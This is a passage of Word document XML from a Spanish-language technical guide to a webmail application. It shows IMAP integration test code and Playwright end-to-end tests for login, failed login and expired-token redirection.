        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;p&gt;Este es el cuerpo &lt;strong&gt;HTML&lt;/strong&gt;&lt;/p&gt;'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Recuperar vía IMAP con imapflow</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>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ImapFlow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">imap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pass</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connect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lock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getMailboxLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'INBOX'</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messages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ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'1:*'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { envelope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source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> })) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(msg)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(messages</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toBeGreaterThanOrEqual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// 4. Parsear con PostalMime</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> latest </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> messages[messages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ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostalMime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">source</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(parsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subject</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'Test IMAP Integration'</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(parsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toContain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'texto plano'</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(parsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toContain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;strong&gt;HTML&lt;/strong&gt;'</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lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">release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logout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30000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Timeout 30s para operaciones IMAP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="207"/>
    <w:bookmarkEnd w:id="208"/>
    <w:bookmarkStart w:id="212" w:name="testing-e2e-playwright"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.3 Testing E2E (Playwright)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Playwright es el framework de E2E recomendado para aplicaciones Vue.js en 2026, superando a Cypress en descargas npm, estrellas GitHub y ofertas de empleo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[261]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Soporta ejecución paralela cross-browser, espera automática para reducir flaky tests y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">APIRequestContext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para tests híbridos API+UI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[260]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="209" w:name="Xc644e9d4f1da152866d08ead35b3f54f172fba5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.3.1 Flujos Críticos: Login, Compose, Enviar, Recibir</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/web/e2e/auth.spec.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { test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'@playwright/test'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Flujo de Autenticación'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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'login exitoso redirige a inbox'</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'/login'</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'[data-testid="username"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'testuser'</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'[data-testid="password"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'SecurePass123!'</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'[data-testid="login-button"]'</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tringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/inbox'</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'[data-testid="inbox-title"]'</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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'login fallido muestra mensaje de error'</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'/login'</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'[data-testid="username"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'wrong'</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'[data-testid="password"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'wrong'</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'[data-testid="login-button"]'</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'[data-testid="login-error"]'</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tringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/login'</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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'token expirado redirige a login'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ({ page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> context }) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Simular token expirado inyectando uno inválido</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">addInitScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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'accessToken'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'expired-token-xxx'</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'/inbox'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Debería redirigir a login cuando el API rechaza el token</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tringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'/login'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">10000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SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/web/e2e/compose.spec.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { test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'@playwright/test'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
